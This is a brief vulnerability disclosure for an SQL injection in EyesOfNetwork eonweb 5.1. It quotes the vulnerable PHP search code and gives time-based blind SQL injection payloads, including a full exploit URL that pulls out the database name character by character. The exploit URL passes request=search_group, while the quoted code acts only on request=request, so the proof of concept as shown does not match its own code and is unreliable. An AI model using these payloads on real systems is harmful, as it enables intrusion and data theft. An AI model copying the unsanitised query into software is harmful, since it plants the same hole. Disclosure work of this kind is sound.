powered by minhaizhao from Anyuntec

version: 5.1

https://github.com/EyesOfNetworkCommunity/eonweb

Vulnerability details

/srv/eyesofnetwork/eonweb-5.1/module/admin_group/search.php Line 28

if(isset($_GET['term']) && isset($_GET['request']) && $_GET['request'] == "request") {
    $result=sqlrequest($database_eonweb,"select * from ldap_groups_extended where group_name LIKE '%".$_GET['term']."%' order by group_name");
    
    $array = array();
    while ($line = mysqli_fetch_array($result)){
        array_push($array, $line[1]);
    }
    echo json_encode($array);
}

$_GET['term'] has not been filtered to cause injection

EXP:

https://192.168.91.66/module/admin_group/search.php?request=search_group&term=%'  and sleep( if(ascii(substr(database(),1,1))<101,0,5 )) %23 

term=%' and sleep( if(ascii(substr(database(),1,1))<101,0,5 )) %23

The page will be delayed for 5 seconds

term=%' and sleep( if(ascii(substr(database(),1,1))=101,0,5 )) %23

The page will be delayed for 0 seconds